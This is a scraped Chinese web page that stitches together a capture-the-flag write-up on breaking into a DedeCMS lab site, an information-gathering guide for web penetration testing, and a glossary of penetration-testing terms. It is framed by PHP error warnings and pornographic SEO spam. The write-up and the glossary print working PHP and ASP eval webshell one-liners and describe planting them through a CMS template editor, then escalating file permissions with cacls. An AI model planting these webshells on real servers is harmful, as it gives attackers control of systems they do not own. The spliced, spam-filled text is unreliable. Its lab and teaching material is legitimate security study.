Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 国产精品视频第一区二区,日韩专区中文字幕,国产成人精品影视

          整合營銷服務商

          電腦端+手機端+微信端=數(shù)據(jù)同步管理

          免費咨詢熱線:

          滲透測試-真的很簡單

          滲透測試-真的很簡單

          僅供學習,禁止用于違法行為。請勿利用文章內(nèi)的相關技術從事非法測試,如因此產(chǎn)生的一切不良后果與文章作者和本公眾號無關。

          題目地址

          https://www.ichunqiu.com/experiment/detail?id=51123&source=1&otype=1

          題目要求

          要求獲取目標網(wǎng)站的FLAG信息

          開啟環(huán)境后的頁面


          根據(jù)提示,我們訪問http://file.ichunqiu.com/49ba59ab下載dedeCMS,下載下來是一個一鍵爆賬號密碼的軟件

          輸入目標地址http://www.test.ichunqiu爆破

          得到賬號和密碼MD5值

          對加密MD5值進行解密

          在線MD5解密:https://www.somd5.com/

          得到密碼:only_system

          有賬號密碼。但是后臺地址不知道,進行后臺目錄掃描

          環(huán)境中tools里自帶了很多的工具,這里找到目錄掃描的工具

          這里使用御劍后臺掃描工具

          對每個地址進行查看,發(fā)現(xiàn),并沒有我們想要的后臺,嘗試更換字典或掃描器進行掃描,發(fā)現(xiàn)還是沒有后臺地址

          百度找織夢cms后臺的方法

          日志暴露后臺地址

          https://blog.csdn.net/forest_fire/article/details/50944689

          發(fā)現(xiàn)可以從報錯文件 /data/mysql_error_trace.inc/data/mysqli_error_trace.inc 中,可得到泄露的后臺路徑,我們訪問

          http://www.test.ichunqiu/data/mysql_error_trace.inc 發(fā)現(xiàn)有個目錄

          進行訪問,發(fā)現(xiàn)就是后臺地址

          輸入賬號密碼進行登錄,成功進入后臺

          下一步我們需要上傳webshell,獲取主機權限。

          百度進行查找獲取webshell方法

          https://www.cnblogs.com/milantgh/p/3634550.html

          在后臺界面,我們看到在模板-->標簽源碼管理處可以進行增加一個新的標簽,也可以對現(xiàn)有的便簽進行編輯

          這里,我們對現(xiàn)有的標簽進行編輯寫入一句話,保存

          <?php @eval($_POST['lemonlove7']); ?>

          上面也有提示,文件的存放位置

          訪問一下,使用環(huán)境中自帶的菜刀進行連接

          成功獲取到shell

          在c盤Documents and Settings(文件和設置) -->Administrator-->桌面看到了flag~ichunqiu.txt文件

          進行查看,發(fā)現(xiàn)是空的,但文件大小不為0

          在cmd命令中使用type進行查看看看 ,發(fā)現(xiàn)是拒絕訪問,哎,肯定是權限不夠

          使用whoami查看我們現(xiàn)在的用戶權限

          whoami

          發(fā)現(xiàn)我們的全是system即為最高權限,但是卻還是看不falg~ichunqiu.txt,進行百度發(fā)現(xiàn)可能是對文件的權限進行了設置

          windows下設置文件及其文件夾權限的方法:https://www.jb51.net/article/51907.htm

          使用cacls命令對falg~ichunqiu.flag文件權限進行查看,發(fā)現(xiàn)對system用戶的權限是n即為無權限

          cacls flag~ichunqiu.txt

          使用cacls命令對falg~ichunqiu.flag文件權限進行修改為F

          cacls flag~ichunqiu.txt /E /P system:F /C

          成功的拿到flag

          type flag~ichunqiu.txt

          結尾

          和師傅們一起成長,努力學習網(wǎng)絡安全知識。

          文章來源:鵬組安全

          如有侵權,請聯(lián)系我們進行刪除

        1. 息收集
        2. 配置和部署管理測試
        3. 身份管理測試
        4. 認證測試
        5. 授權測試
        6. 會話管理測試
        7. 輸入驗證測試
        8. 錯誤處理測試
        9. 弱密碼測試
        10. 業(yè)務邏輯測試
        11. 客戶端測試

        12. 文章目錄

          • 1. 利用搜索引擎發(fā)現(xiàn)和偵察信息泄露
          • 2. web服務器指紋
          • 3. 查看web 服務器元文件發(fā)現(xiàn)信息泄漏測試方法1:Robots.txt測試方法2:meta tag
          • 4.枚舉web 服務器上的應用程序
          • 5. 審查網(wǎng)頁評論和信息泄露的元數(shù)據(jù)
          • 6. 確認程序入口
          • 7. 通過應用程序映射執(zhí)行路徑
          • 8. web 應用程序指紋和web 應用程序框架
          • 原文鏈接

          1. 利用搜索引擎發(fā)現(xiàn)和偵察信息泄露

          測試對象:testphp.vulnweb.com

          嘗試在谷歌中搜索:“site: testphp.vulnweb.com”,得到基本的爬蟲結果如下:

          使用查詢發(fā)現(xiàn)了更多有用的信息:

          參考

          http://www.mrjoeyjohnson.com/Google.Hacking.Filters.pdf

          2. web服務器指紋

          Web 服務器指紋是滲透測試的關鍵任務。了解正在運行的 web 服務器的版本和類型能夠讓測試人員確定已知的漏洞以及在測試過程中使用適當?shù)姆椒ā?/p>

          a)黑盒測試:

          確認web 服務器身份的最簡單最基本的方式是利用netcat查看 HTTP 響應報頭中的服務器字段。

          b)測試對象:

          nc google.com 80

          GET

          / HTTP/1.1

          Host: google.com

          enter

          enter

          c)自動測試工具:

          httprint, Burpsuite

          d)在線測試:

          https://www.netcraft.com/

          e)示例:

          • netcat結果如下:

          • 當然,我們也可以使用瀏覽器的一些拓展:

          • 在線解決方案:

          參考

          • http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/
          • https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
          • http://netcat.sourceforge.net.
          • https://www.darknet.org.uk/2007/09/httprint-v301-web-server-fingerprinting-tool-download/
          • http://www.net-square.com/httprint.html

          3. 查看web 服務器元文件發(fā)現(xiàn)信息泄漏

          測試方法1:Robots.txt

          網(wǎng)絡蜘蛛/機器人/爬蟲檢索 (訪問) 一個網(wǎng)頁, 然后遞歸遍歷超鏈接, 以檢索進一步的 web 內(nèi)容。他們的行為是由web根目錄中robots.txt文件的Robots Exclusion Protocol指定的。

          測試對象:abc.com/robots.txt

          工具: 利用wget(例如: wget http://google.com/robots.txt)

          參考:http://www.robotstxt.org/

          示例:http://local/mutillidae/robots.txt

          測試方法2:meta tag

          Tag位于每個 HTML 文檔的 HEAD 部分, 并且應該在一個 web 站點上的下述事件中保持一致:機器人/蜘蛛/爬蟲的起始點不是從 webroot 以外的文檔鏈接開始的。

          網(wǎng)絡蜘蛛/機器人/爬蟲可以故意忽略 “<META NAME=”ROBOTS”>” tag。

          工具: BurpSuite

          4.枚舉web 服務器上的應用程序

          a) url:

          • http://www.example.com/webmail·
          • http://mail.example.com/

          b) 端口:

          最基本和最簡單的方法是使用端口掃描儀 (如 nmap)。例如:

          nmap 0-65535 192.168.1.1

          c) 域名:

          • 有許多方法可以用來確定DNS名稱給給定的IP, 其中一個是nslookup。

          cmd

          nslookup

          all

          set type=all

          example.com

          • 基于Web的 DNS 搜索:

          http://searchdns.netcraft.com/?host

          • Reverse IP

          -Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (require free

          membership)

          – MSN search: http://search.msn.com syntax: “ip:x.x.x.x” (without the quotes) o webhosting info: http://whois.webhosting.info/

          -DNSstuff: http://www.dnsstuff.com/

          d) 谷歌hack技術

          示例:

          • nmap:

          • nslookup

          e) 工具

          • nslookup, dig
          • Port scanner: nmap http://www.insecure.org
          • Nessus Vulnerability Scanner. http://www.nessus.org
          • Search engine: shodan.io, google.

          5. 審查網(wǎng)頁評論和信息泄露的元數(shù)據(jù)

          對于程序員來說, 在源代碼中添加詳細注釋和元數(shù)據(jù)是非常普遍的,甚至是推薦的。但是, HTML 代碼中包含的注釋和元數(shù)據(jù)可能會對潛在攻擊者暴露內(nèi)部信息。應對源代碼中的注釋和元數(shù)據(jù)進行審查以確定是否泄露了任何信息。

          工具:

          • Wget
          • 任何瀏覽器

          6. 確認程序入口

          請求:

          • 確認GETs和POST的位置
          • 確認POST 請求中使用的所有參數(shù)(包括隱藏參數(shù)和非隱藏參數(shù))
          • 確認GETs請求中使用的所有參(通常在?之后)
          • 確認查詢字符串的所有參數(shù)
          • 注意參數(shù), 即使編碼或加密, 并確定哪些帳戶由哪些應用程序處理。

          響應:

          • 確認并記下任何header
          • 確認哪里有重定向(300 HTTP 狀態(tài)代碼),400 狀態(tài)代碼, 403 禁用和500內(nèi)部服務器錯誤。

          工具:

          • 攔截代理: Burpsuite, paros, webscarab,…
          • 瀏覽器插件: Tamper data on firefox,…

          一些注意事項:

          • 為了發(fā)現(xiàn)隱藏的參數(shù), 可以使用Burpsuit的以下選項:

          • 使用Burpsuite 和狀態(tài)代碼來查找它們

          • 使用Burpsuit捕獲請求參數(shù)和響應頭

          7. 通過應用程序映射執(zhí)行路徑

          在開始安全測試之前, 了解應用程序的結構是至關重要的。如果不徹底了解應用程序的布局, 就不可能對其進行徹底的測試。

          a)測試目的

          • 映射目標應用程序并了解主要工作流

          b)自動蜘蛛工具

          • Burpsuit
          • ZAP

          c)自動化蜘蛛示例

          8. web 應用程序指紋和web 應用程序框架

          Web 框架指紋是信息采集過程中的一個重要子任務。了解框架的類型會有很大的優(yōu)勢,特別是當這種類型已經(jīng)被滲透測試過。不僅是版本中已知的漏洞使得指紋處理如此重要, 框架以及已知文件結構中的特定錯誤同樣如此。

          a) 黑盒測試

          為了定義當前框架, 有幾個最常見的位置可供查找

          • HTTP 標頭
          • cookie
          • HTML 源代碼
          • 特定文件和文件夾

          b) HTTP 標頭

          • 標識 web 應用程序框架的最基本形式是查看 HTTP 響應標頭中的 X-Powered-By 字段。

          c) Cookies

          確定當前 web 框架的另一個類似的、更可靠的方法是特定框架的 cookie。

          d) HTML 源代碼

          此技術基于在 HTML 頁面源代碼中查找某些模式。我們可以找到很多信息, 幫助測試人員識別特定的 web 應用程序。

          e)特定文件和文件夾

          每個應用程序在服務器上都有自己的特定文件和文件夾結構。我們可以使用工具或手動訪問它們。

          f)Dirbusting 示例

          • 谷歌黑客技術

          https://www.exploit-db.com/ghdb/4675/

          • BurpSuite 入侵

          g)常見應用程序標識符

          h)Nikto

          i)Whatweb

          原文鏈接

          https://packetstormsecurity.com/files/download/146830/web-application-security-testing.pdf

          來也慚愧,菜鳥小白已經(jīng)干了三年安全產(chǎn)品的測試,但是對于滲透測試都不曾好好了解,一直停留在基礎功能測試和自動化測試的摸索上。正好我們組內(nèi)在組織滲透測試的全套課程學習,將會從最基礎的內(nèi)容開始學起,學習的內(nèi)容菜鳥小白也會整理出來,一起分享。

          今天我們一起來看看一些基礎概念吧。

          基礎概念

          1、腳本(asp、php、jsp)

          ASP:ASP即Active Server Pages,是Microsoft公司開發(fā)的服務器端腳本環(huán)境,可用來創(chuàng)建動態(tài)交互式網(wǎng)頁并建立強大的web應用程序。當服務器收到對ASP文件的請求時,它會處理包含在用于構建發(fā)送給瀏覽器的HTML(Hyper Text Markup Language,超文本標記語言)網(wǎng)頁文件中的服務器端腳本代碼。除服務器端腳本代碼外,ASP文件也可以包含文本、HTML(包括相關的客戶端腳本)和com組件調(diào)用。

          PHP:PHP即“超文本預處理器”,是一種通用開源腳本語言。PHP是在服務器端執(zhí)行的腳本語言,與C語言類似,是常用的網(wǎng)站編程語言。

          JSP:JSP(全稱JavaServer Pages)是由Sun Microsystems公司主導創(chuàng)建的一種動態(tài)網(wǎng)頁技術標準。JSP部署于網(wǎng)絡服務器上,可以響應客戶端發(fā)送的請求,并根據(jù)請求內(nèi)容動態(tài)地生成HTML、XML或其他格式文檔的Web網(wǎng)頁,然后返回給請求者。

          2、html(css、js、html)

          html:HTML稱為超文本標記語言,是一種標識性的語言。它包括一系列標簽.通過這些標簽可以將網(wǎng)絡上的文檔格式統(tǒng)一,使分散的Internet資源連接為一個邏輯整體。HTML文本是由HTML命令組成的描述性文本,HTML命令可以說明文字,圖形、動畫、聲音、表格、鏈接等。

          3、HTTP協(xié)議

          HTTP:http是一個簡單的請求-響應協(xié)議,它通常運行在TCP之上。它指定了客戶端可能發(fā)送給服務器什么樣的消息以及得到什么樣的響應。請求和響應消息的頭以ASCII碼形式給出;而消息內(nèi)容則具有一個類似MIME的格式。

          4、CMS(B/S)

          CMS:內(nèi)容管理系統(tǒng)(content management system,CMS),我們這邊一般使用的B/S架構,也就是瀏覽器訪問的方式。另外還有一種C/S架構,就是通過應用程序的訪問方式。

          5、MD5

          MD5:MD5信息摘要算法(英語:MD5 Message-Digest Algorithm),一種被廣泛使用的密碼散列函數(shù),可以產(chǎn)生出一個128位(16字節(jié))的散列值(hash value),用于確保信息傳輸完整一致。滲透測試中一般密碼的解碼需要使用。

          6、其它概念

          肉雞:被黑客入侵并被長期駐扎的計算機或服務器

          抓雞:利用使用量大的程序的漏洞,使用自動化方式獲取肉雞的行為

          webshell:通過web入侵的一種腳本工具,可以據(jù)此對網(wǎng)站服務進行一定程度的控制

          漏洞:硬件、軟件、協(xié)議等可利用的安全缺陷,可能被攻擊者利用,對數(shù)據(jù)進行篡改、控制等。

          一句話木馬:通過向服務器提交一句簡短的代碼,配合本地客戶端實現(xiàn)webshell功能的木馬。

          舉例:

          <%eval request("pass")%>

          <%execute(request("pass"))%>

          其中request("pass")接收客戶端提交的數(shù)據(jù),pass為執(zhí)行命令的參數(shù)值。

          eval/execute,函數(shù)執(zhí)行客戶端命令的內(nèi)容

          又如:PHP的一句話木馬

          <?php eval($_POST[123]);?>

          下面的代碼可以用POST的方式提交PHP語句,利用php腳本的各種函數(shù),就可以實現(xiàn)執(zhí)行系統(tǒng)命令、修改數(shù)據(jù)庫、增刪改查等各種功能。

          <form method=post action=http://木馬地址>

          <textarea name=123>

          //這里寫PHP代碼

          phpinfo();

          </textarea>

          <input type=submit>

          </form>

          提權:操作系統(tǒng)低權限的賬戶將自己提升為管理員權限使用的方法。

          后門:黑客為了對主機進行長期的控制沒在機器上種植的一段程序或留下的一個“入口”

          跳板:使用肉雞IP來實施攻擊其他目標,以便更好的隱藏自己的身份信息

          旁站:同一個物理服務器下搭建的多個網(wǎng)站。如:服務器下有三個網(wǎng)站A、B、C,B和C就是A的旁站。

          旁站入侵:即同服務器下的網(wǎng)址入侵,入侵之后可以通過提權跨目錄等手段拿到目標網(wǎng)址的權限。常見的旁站查詢工具有:WebRobot、御劍、明小子和web在線查詢等。

          C段入侵:即同C段下服務器入侵。如目標IP為192.168.1.253入侵192.168.1.*的任意一臺機器,然后利用一些黑客工具嗅探獲取在網(wǎng)上傳輸?shù)母鞣N信息。常用的工具有:Cain(Windows)、Sniffit(UNIX)、Snoop、tcpdump、dsniff等

          滲透測試

          黑盒測試:在未授權的情況,模擬黑客的攻擊方法和思維方式,來評估計算機網(wǎng)絡系統(tǒng)可能存在的安全風險。黑盒測試考驗的是綜合能力(OS、database、script、code、思路和社工)。

          白盒測試:從內(nèi)部發(fā)起,偏向于代碼審計

          APT攻擊:Advanced Persistent Threat,高級可持續(xù)性攻擊,是指組織(特別是政府)或者小團體利用先進的攻擊手段對特定目標進行長期持續(xù)性網(wǎng)絡攻擊的攻擊形式,具有以下特點:

          1.極強的隱蔽性

          2.潛伏期長,持續(xù)性強

          3.目標性強

          滲透測試的特點

          充滿挑戰(zhàn)與刺激;

          思路和經(jīng)驗積累往往決定成敗;

          滲透測試的流程

          滲透測試:更全面的找出服務器的問題,更傾向于保護

          明確目標——信息收集——漏洞探測——漏洞驗證——信息分析——獲取所需——信息整理——形成報告

          明確目標:范圍、規(guī)則、需求

          信息收集:基礎、系統(tǒng)、應用、版本(版本漏洞)、服務、人員(密碼破解)、防護

          漏洞探測:系統(tǒng)漏洞、webserver漏洞、web應用漏洞、其它端口服務漏洞、通信安全

          漏洞驗證:自動化驗證、手工驗證、試驗驗證、登錄猜測、業(yè)務漏洞驗證、公開資源的利用

          信息分析:精準打擊、繞過防御機制、定制攻擊路徑、繞過檢測機制、繞過代碼

          獲取所需:實施攻擊、獲取內(nèi)部信息、進一步滲透、持續(xù)性存在*、清理痕跡

          信息整理:整理滲透工具、整理收集信息、整理

          形成報告:按需整理、補充介紹、修補建議


          如果可以的話,請幫忙點擊下方廣告,給菜鳥小白眾籌一點電費,謝謝~


          主站蜘蛛池模板: 国产精品电影一区| 国产精品成人一区二区三区| 免费人妻精品一区二区三区| 三上悠亚一区二区观看| 无码国产精品一区二区免费虚拟VR | 亚洲丰满熟女一区二区v| 国产精品亚洲高清一区二区| 无码夜色一区二区三区| 日韩人妻精品无码一区二区三区 | 午夜无码视频一区二区三区| 骚片AV蜜桃精品一区| 国产激情无码一区二区三区| 无码午夜人妻一区二区不卡视频| 中文字幕一区二区三区视频在线| 成人精品一区二区不卡视频| 91福利一区二区| 无码av免费一区二区三区| 亚洲老妈激情一区二区三区| 相泽亚洲一区中文字幕| 熟女少妇精品一区二区| 人妻少妇AV无码一区二区| 久久精品国产一区二区三区不卡| 一区二区三区美女视频| 国产一区韩国女主播| 国产精品无码不卡一区二区三区| 中文字幕一区二区免费| 亚洲日本中文字幕一区二区三区| 国产在线无码一区二区三区视频| 久久精品一区二区东京热| 久久精品无码一区二区三区 | 国产成人欧美一区二区三区| 精品无码国产一区二区三区51安| 波多野结衣中文一区| 国产高清在线精品一区二区| 国产乱码精品一区二区三区四川| 中文字幕无码一区二区免费| 亚洲AV综合色一区二区三区| 少妇精品无码一区二区三区| 99精品一区二区免费视频| 日韩免费一区二区三区在线| 日韩美女在线观看一区|